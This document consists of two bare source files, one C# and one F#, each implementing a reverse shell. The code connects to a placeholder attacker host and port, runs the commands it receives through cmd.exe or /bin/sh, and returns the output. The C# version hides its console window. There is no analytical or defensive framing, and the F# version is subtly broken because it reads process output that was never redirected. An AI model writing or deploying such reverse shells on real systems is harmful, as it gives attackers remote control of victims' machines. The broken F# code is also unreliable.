File: reverse_shell.cs
using System;
using System.Net.Sockets;
using System.IO;

class Program {
    static void Main() {
        using (TcpClient client = new TcpClient("attacker_ip", attacker_port)) {
            using (Stream stream = client.GetStream()) {
                StreamReader reader = new StreamReader(stream);
                StreamWriter writer = new StreamWriter(stream) { AutoFlush = true };
                string command;
                while ((command = reader.ReadLine()) != null) {
                    System.Diagnostics.Process proc = new System.Diagnostics.Process {
                        StartInfo = new System.Diagnostics.ProcessStartInfo {
                            FileName = "cmd.exe",
                            Arguments = "/c " + command,
                            RedirectStandardOutput = true,
                            UseShellExecute = false,
                            CreateNoWindow = true
                        }
                    };
                    proc.Start();
                    writer.WriteLine(proc.StandardOutput.ReadToEnd());
                    proc.WaitForExit();
                }
            }
        }
    }
}

File: reverse_shell.fs
open System.Net.Sockets
open System.IO
let client = new TcpClient("attacker_ip", attacker_port)
let stream = client.GetStream()
let reader = new StreamReader(stream)
let writer = new StreamWriter(stream)
writer.AutoFlush <- true

let rec shell () =
    let input = reader.ReadLine()
    let output = System.Diagnostics.Process.Start("/bin/sh", "-c " + input)
    writer.WriteLine(output.StandardOutput.ReadToEnd())
    shell()

shell()